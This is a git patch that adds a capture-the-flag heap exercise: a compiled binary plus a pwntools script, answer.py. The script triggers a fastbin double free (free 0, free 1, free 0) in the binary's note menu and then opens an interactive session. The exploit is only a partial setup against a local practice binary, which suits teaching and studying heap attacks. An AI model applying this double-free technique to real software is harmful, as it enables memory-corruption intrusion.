From 33465c85e063515cf79cd8e9f25467da9d127f2e Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Sat, 29 Jan 2022 14:39:11 +0800 Subject: [PATCH] Added FastBin/fastbin --- FastBin/fastbin/answer.py | 44 ++++++++++++++++++++++++++++++++++++++ FastBin/fastbin/fastbin | Bin 0 -> 10488 bytes 2 files changed, 44 insertions(+) create mode 100644 FastBin/fastbin/answer.py create mode 100755 FastBin/fastbin/fastbin diff --git a/FastBin/fastbin/answer.py b/FastBin/fastbin/answer.py new file mode 100644 index 0000000..173273b --- /dev/null +++ b/FastBin/fastbin/answer.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python3 +# coding = utf-8 + +from pwn import * +from LibcSearcher import * +context(arch = "amd64", os = "linux", log_level = "debug") + +def note_init(name): + p.recvuntil("what's your name:\n") + p.send(name) + p.recvuntil('hello, ') + +def note_create(size, data): + p.recvuntil('>') + p.sendline('1') + p.recvuntil('size ?') + p.sendline(str(size)) + p.recvuntil('data:') + p.sendline(data) + +def note_delete(index): + p.recvuntil('>') + p.sendline('2') + p.recvuntil('index?') + p.sendline(str(index)) + +def note_print(index): + p.recvuntil('>') + p.sendline('3') + p.recvuntil('index?') + p.sendline(str(index)) + +p = process('./fastbin') +elf = ELF('./fastbin') +#gdb.attach(p, "") + +note_init('aaa') +note_create(0x70, 'a') +note_create(0x70, 'a') +note_delete(0) +note_delete(1) +note_delete(0) + +p.interactive() \ No newline at end of file diff --git a/FastBin/fastbin/fastbin b/FastBin/fastbin/fastbin new file mode 100755 index 0000000000000000000000000000000000000000..06048c6bfca50d1840fd9073bb0e3d5951c49279 GIT binary patch literal 10488 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